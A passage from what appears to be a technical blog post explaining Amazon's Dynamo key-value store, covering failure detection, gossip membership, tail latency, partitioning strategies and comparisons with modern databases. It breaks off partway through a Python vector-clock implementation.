&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24s3u9bwupqxo96z5l4c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24s3u9bwupqxo96z5l4c.png" alt="image" width="800" height="804"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Design Points
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;No single coordinator&lt;/strong&gt;: Every node maintains its own view of cluster membership. There's no central registry, so there's no single point of failure for membership data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Failure suspicion vs. detection&lt;/strong&gt;: Rather than making a binary "alive/dead" judgment, nodes maintain a &lt;em&gt;suspicion level&lt;/em&gt; that rises the longer a peer is unresponsive (the idea behind accrual failure detectors such as Phi Accrual). This avoids false positives from transient network hiccups.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Node A's view of Node B:
- Last heartbeat: 3 seconds ago → Suspicion low → Healthy
- Last heartbeat: 15 seconds ago → Suspicion rising → Likely slow/degraded
- Last heartbeat: 60 seconds ago → Suspicion high → Treat as failed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
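&lt;p&gt;A toy version of that graduated judgment, with invented thresholds (a real accrual detector derives a continuous score from the observed heartbeat distribution rather than fixed cutoffs):&lt;/p&gt;

```python
class SuspicionDetector:
    """Toy accrual-style detector: suspicion grows with heartbeat silence.

    The thresholds are illustrative only; production detectors tune
    these from observed inter-heartbeat arrival times.
    """

    def __init__(self, healthy_s: float = 5.0, failed_s: float = 30.0):
        self.healthy_s = healthy_s
        self.failed_s = failed_s
        self.last_seen: dict[str, float] = {}

    def heartbeat(self, peer: str, now: float) -> None:
        """Record that we heard from a peer at time `now` (seconds)."""
        self.last_seen[peer] = now

    def status(self, peer: str, now: float) -> str:
        """Map elapsed silence to a graduated health verdict."""
        elapsed = now - self.last_seen.get(peer, float("-inf"))
        if elapsed < self.healthy_s:
            return "healthy"
        if elapsed < self.failed_s:
            return "suspect"   # degraded or slow, but do not evict yet
        return "failed"


d = SuspicionDetector()
d.heartbeat("node-b", now=100.0)
```

&lt;p&gt;Note the three-state answer: routing around a "suspect" peer is cheap and reversible, while declaring it "failed" triggers heavier recovery work.&lt;/p&gt;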



&lt;p&gt;&lt;strong&gt;Decentralized bootstrapping&lt;/strong&gt;: New nodes contact a seed node to join, then gossip spreads their presence to the rest of the cluster. Ring membership is eventually consistent—different nodes may have slightly different views of the ring momentarily, which is acceptable.&lt;/p&gt;
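&lt;p&gt;The membership exchange can be sketched as a toy simulation (node names and the round structure are invented for illustration; real gossip exchanges richer per-node state than a bare set of names):&lt;/p&gt;

```python
import random


def gossip_round(views: dict[str, set[str]], rng: random.Random) -> None:
    """One round: every node exchanges and merges views with a random peer."""
    for node in list(views):
        peer = rng.choice([n for n in views if n != node])
        merged = views[node] | views[peer]
        views[node] = set(merged)
        views[peer] = set(merged)


# New node "D" has joined via seed node "A": initially only A and D know.
views = {"A": {"A", "B", "C", "D"}, "B": {"A", "B", "C"},
         "C": {"A", "B", "C"}, "D": {"A", "D"}}
rng = random.Random(42)
for _ in range(10):
    gossip_round(views, rng)
# Views only grow under union, so repeated rounds converge on full membership.
```

&lt;p&gt;This is exactly the "eventually consistent ring membership" property: mid-convergence, different nodes hold different views, and the system tolerates that.&lt;/p&gt;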

&lt;h2&gt;
  
  
  Performance Characteristics: Real Numbers
&lt;/h2&gt;

&lt;p&gt;The paper provides fascinating performance data. Let me break it down:&lt;/p&gt;

&lt;h3&gt;
  
  
  Latency Distribution
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Metric              | Average | 99.9th Percentile
--------------------|---------|------------------
Read latency        | ~10ms   | ~200ms
Write latency       | ~15ms   | ~200ms

Key insight: 99.9th percentile is ~20x the average!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why the huge gap?&lt;/strong&gt; The 99.9th percentile is affected by:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Garbage collection pauses&lt;/li&gt;
&lt;li&gt;Disk I/O variations&lt;/li&gt;
&lt;li&gt;Network jitter&lt;/li&gt;
&lt;li&gt;Load imbalance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why Amazon SLAs are specified at 99.9th percentile, not average.&lt;/p&gt;
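&lt;p&gt;To make the gap concrete, here is a tiny synthetic illustration (the sample and numbers are invented, not from the paper):&lt;/p&gt;

```python
# 0.1% of requests are slow outliers (e.g., a GC pause): the average
# barely notices them, but the 99.9th percentile is exactly those requests.
latencies = [10.0] * 9990 + [200.0] * 10          # milliseconds
avg = sum(latencies) / len(latencies)             # pulled up only slightly
p999 = sorted(latencies)[int(0.999 * len(latencies))]
print(f"avg={avg:.2f}ms  p99.9={p999:.0f}ms")
```

&lt;p&gt;An SLA stated on the average would pass here while one request in a thousand is 20x slower, which is why the SLA targets the tail.&lt;/p&gt;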

&lt;h3&gt;
  
  
  Version Conflicts
&lt;/h3&gt;

&lt;p&gt;These numbers come from 24 hours of Amazon's production shopping cart traffic (per the Dynamo paper). Note that they reflect Amazon's specific workload characteristics, not a universal baseline:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;99.94%    - Saw exactly one version (no conflict)
0.00057%  - Saw 2 versions
0.00047%  - Saw 3 versions  
0.00039%  - Saw 4 versions
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Takeaway&lt;/strong&gt;: Conflicts are rare in practice. When they do occur, they are most often caused by concurrent automated writers (the paper's "busy robots"), not by node failures.&lt;/p&gt;

&lt;h2&gt;
  
  
  Partitioning Strategy Evolution
&lt;/h2&gt;

&lt;p&gt;Dynamo evolved through three partitioning strategies. This evolution teaches us important lessons:&lt;/p&gt;

&lt;h3&gt;
  
  
  Strategy 1: Random Tokens (Initial)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Problem: Random token assignment → uneven load
Problem: Adding nodes → expensive data scans
Problem: Can't easily snapshot the system
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Operational lesson&lt;/strong&gt;: Random token assignment sounds elegant but is a nightmare in practice. Each node gets a random position on the ring, which means wildly different data ownership ranges and uneven load distribution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Strategy 2: Equal-sized Partitions + Random Tokens
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Improvement: Decouples partitioning from placement
Problem: Still has load balancing issues
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Strategy 3: Q/S Tokens Per Node — Equal-sized Partitions + Deterministic Placement (Current)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What Q and S mean:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Q&lt;/strong&gt; = the total number of fixed partitions the ring is divided into (e.g. 1024). Think of these as equally-sized, pre-cut slices of the hash space that never change shape.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;S&lt;/strong&gt; = the number of physical servers currently in the cluster (e.g. 8).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Q/S&lt;/strong&gt; = how many of those fixed slices each server is responsible for (e.g. 1024 / 8 = &lt;strong&gt;128 partitions per server&lt;/strong&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The key shift from earlier strategies: the ring is now divided into Q fixed, equal-sized partitions &lt;em&gt;first&lt;/em&gt;, and then those partitions are assigned evenly to servers. Servers no longer get random positions — they each own exactly Q/S partitions, distributed evenly around the ring.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Example: Q=12 partitions, S=3 servers

Ring divided into 12 equal slices (each covers 30° of the 360° ring):
  Partition  1:   0°– 30°  → Server A
  Partition  2:  30°– 60°  → Server B
  Partition  3:  60°– 90°  → Server C
  Partition  4:  90°–120°  → Server A
  Partition  5: 120°–150°  → Server B
  Partition  6: 150°–180°  → Server C
  ...and so on, round-robin

Each server owns exactly Q/S = 12/3 = 4 partitions → perfectly balanced.

When a 4th server joins (S becomes 4):
  New Q/S = 12/4 = 3 partitions per server.
  Each existing server hands off 1 partition to the new server.
  Only 3 out of 12 partitions move — the rest are untouched.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
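&lt;p&gt;A sketch of that join handoff, assuming a simple partition-to-server table (&lt;code&gt;rebalance&lt;/code&gt; and the table layout are illustrative, not Dynamo's actual API):&lt;/p&gt;

```python
def rebalance(assignment: dict[int, str], new_server: str) -> dict[int, str]:
    """Hand off just enough partitions to the joining server so every
    server ends up with Q/S partitions; all other partitions stay put."""
    n_servers = len(set(assignment.values())) + 1
    target = len(assignment) // n_servers      # Q / S_new per server
    new_assignment = dict(assignment)
    # Group partitions by current owner.
    owned: dict[str, list[int]] = {}
    for p, s in assignment.items():
        owned.setdefault(s, []).append(p)
    # Each existing server keeps `target` partitions and donates the rest.
    for s, parts in sorted(owned.items()):
        for p in sorted(parts)[target:]:
            new_assignment[p] = new_server
    return new_assignment


before = {p: "ABC"[p % 3] for p in range(12)}  # Q=12, S=3: 4 partitions each
after = rebalance(before, "D")
moved = [p for p in before if before[p] != after[p]]
# Only 3 of 12 partitions change owner; the other 9 are untouched.
```

&lt;p&gt;Because partitions are fixed-size files, each of those moves is a whole-file transfer, which is what makes bootstrapping fast and archival simple.&lt;/p&gt;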





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Benefits:
✓ Perfectly even load distribution (every server owns the same number of partitions)
✓ Fast bootstrapping — a joining node receives whole partition files, not scattered key ranges
✓ Easy archival — each partition is a self-contained file that can be snapshotted independently
✓ Membership metadata shrinks from multiple MB (hundreds of random tokens) to a few KB (a simple partition-to-server table)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This evolution — from random tokens to fixed, equal-sized partitions with balanced ownership — is one of the most instructive operational learnings from Dynamo. The early approach prioritized simplicity of implementation; the later approach prioritized operational simplicity and predictability.&lt;/p&gt;

&lt;h2&gt;
  
  
  Comparing Dynamo to Modern Systems
&lt;/h2&gt;

&lt;p&gt;Let's see how Dynamo concepts appear in systems you might use today:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;System&lt;/th&gt;
&lt;th&gt;Consistency Model&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;th&gt;Dynamo Influence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cassandra&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tunable (N, R, W)&lt;/td&gt;
&lt;td&gt;Time-series, analytics&lt;/td&gt;
&lt;td&gt;Direct descendant — heavily inspired by Dynamo, uses same consistent hashing and quorum concepts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Riak&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tunable, vector clocks&lt;/td&gt;
&lt;td&gt;Key-value store&lt;/td&gt;
&lt;td&gt;Closest faithful Dynamo implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Amazon DynamoDB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Eventually consistent by default&lt;/td&gt;
&lt;td&gt;Managed NoSQL&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;⚠️ Not the same as Dynamo!&lt;/strong&gt; DynamoDB is a completely different system internally, with no vector clocks and much simpler conflict resolution. Shares the name and high-level inspiration only.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Voldemort&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tunable&lt;/td&gt;
&lt;td&gt;LinkedIn's data store&lt;/td&gt;
&lt;td&gt;Open-source Dynamo implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Google Spanner&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Linearizable&lt;/td&gt;
&lt;td&gt;Global SQL&lt;/td&gt;
&lt;td&gt;Opposite choice to Dynamo — prioritizes CP via TrueTime clock synchronization&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Redis Cluster&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Eventually consistent&lt;/td&gt;
&lt;td&gt;Caching, sessions&lt;/td&gt;
&lt;td&gt;Uses fixed hash slots (16,384) rather than classic consistent hashing; much simpler conflict resolution&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The DynamoDB confusion&lt;/strong&gt;: Many engineers conflate Amazon DynamoDB with the Dynamo paper. They are very different. DynamoDB is a managed service optimized for operational simplicity. It does not expose vector clocks, does not use the same partitioning scheme, and uses a proprietary consistency model. The paper is about the internal Dynamo storage engine that predates DynamoDB.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  What Dynamo Does NOT Give You
&lt;/h2&gt;

&lt;p&gt;Every senior engineer blog should be honest about limitations. Here's what Dynamo explicitly trades away:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No transactions&lt;/strong&gt;: Operations are single-key only. You can't atomically update multiple keys.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No secondary indexes&lt;/strong&gt;: You can only look up data by its primary key (at least in the original design).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No joins&lt;/strong&gt;: It's a key-value store. There is no query language.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No global ordering&lt;/strong&gt;: Events across different keys have no guaranteed ordering.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No linearizability&lt;/strong&gt;: Even at R=W=N, Dynamo does not provide linearizable reads. There is no global clock, no strict serializability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No automatic conflict resolution&lt;/strong&gt;: The system detects conflicts and surfaces them to the application. The &lt;em&gt;application&lt;/em&gt; must resolve them. If your engineers don't understand this, you will have subtle data bugs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Repair costs at scale&lt;/strong&gt;: The anti-entropy process (Merkle tree reconciliation) is not free. At large scale, background repair traffic can be significant.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector clock growth&lt;/strong&gt;: In high-churn write environments with many coordinators, vector clocks can grow large enough to require truncation, which introduces potential causality loss.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Understanding these limitations is critical to successfully operating Dynamo-style systems in production.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Implementation Example
&lt;/h2&gt;

&lt;p&gt;Below is a self-contained Python implementation of the core Dynamo concepts. It's intentionally simplified—no actual networking, no persistence—but it faithfully models how vector clocks, the consistent hash ring, quorum reads/writes, and conflict detection interact. Each component is explained before its code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Part 1: Vector Clock
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;VectorClock&lt;/code&gt; class is the foundation of version tracking. It's just a dictionary mapping &lt;code&gt;node_id → counter&lt;/code&gt;. Two key operations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;increment(node)&lt;/code&gt; — bump our own counter when we write&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;dominates(other)&lt;/code&gt; — check if one clock is causally "after" another; if neither dominates, the writes were concurrent (conflict)
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;__future__&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;annotations&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;dataclasses&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;dataclass&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;typing&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Optional&lt;/span&gt;


&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Tracks causality across distributed writes.

    A clock like {&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;nodeA&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;: 2, &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;nodeB&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;: 1} means:
      - nodeA has coordinated 2 writes
      - nodeB has coordinated 1 write
      - Any version with these counters has &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;seen&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; those writes
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Return a new clock with node_id&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s counter bumped by 1.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;new_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Returns True if self is causally AFTER other.

        self dominates other when:
          - Every counter in self is &amp;gt;= the same counter in other, AND
          - At least one counter in self is strictly greater.

        Meaning: self has seen everything other has seen, plus more.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;all_keys&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;at_least_one_greater&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_keys&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;self_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;other_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self_val&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;other_val&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;  &lt;span class="c1"&gt;# self is missing something other has seen
&lt;/span&gt;            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self_val&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;other_val&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;at_least_one_greater&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;at_least_one_greater&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Merge two clocks by taking the max of each counter.
        Used after resolving a conflict to produce a new clock
        that has &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;seen&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; everything both conflicting versions saw.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;all_keys&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
